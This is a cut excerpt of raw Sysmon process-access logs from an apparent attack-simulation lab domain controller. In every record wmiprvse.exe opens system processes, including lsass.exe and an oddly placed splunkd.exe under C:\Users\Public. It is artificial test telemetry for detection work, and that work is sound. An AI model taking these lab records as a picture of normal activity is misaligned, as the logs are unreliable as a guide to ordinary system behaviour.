10341000x800000000000000030074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.872{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 